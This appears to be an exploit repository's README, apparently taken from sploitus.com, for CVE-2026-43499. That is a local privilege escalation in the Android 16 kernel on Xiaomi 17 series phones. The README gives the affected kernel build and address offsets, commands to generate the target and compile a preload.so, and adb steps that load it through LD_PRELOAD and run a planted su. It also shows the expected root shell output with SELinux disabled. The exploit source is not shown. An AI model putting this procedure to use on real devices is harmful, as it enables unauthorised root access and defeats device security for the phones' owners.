Share
## https://sploitus.com/exploit?id=C07E932E-4710-512B-9A92-F81FB7C4D342
# CVE-2026-43499 for `popsicle`

This repository contains the CVE-2026-43499 vulnerability on Xiaomi 17 Pro Max (`popsicle`) with Android 16 local privilege escalation. The kernel has been verified as follows:

```text
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
```

All Xiaomi 17, Pro, and Ultra series devices using this kernel are confirmed to be vulnerable. ## Profile

The profile contains only two physical addresses that need to be confirmed on the same firmware-Rooted device:

```json
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}
```

It can be detected directly after connecting a rooted device:

```sh
python3 detect_offset.py
```

## Generate the target

Requires Python 3 and `llvm-objdump`:

```sh
python3 generate_target.py \
  --boot boot.img \
  --profile profile_model.json \
  -o source/src/target.h
```

## Compile

```sh
make -C source clean preload
```

If NDK cannot be automatically detected:

```sh
NDK_ROOT=/path/to/android-ndk make -C source clean preload
```

Final output:

```text
source/build/bin/preload.so
```

## Run

```sh
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
```

Upon success, the following output will be visible:

```text
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
```

After exploiting this vulnerability, it is possible to unlock and enter the desktop. However, the newly started Android app fails to initialize properly, resulting in a crash. After restarting the app, it runs normally again.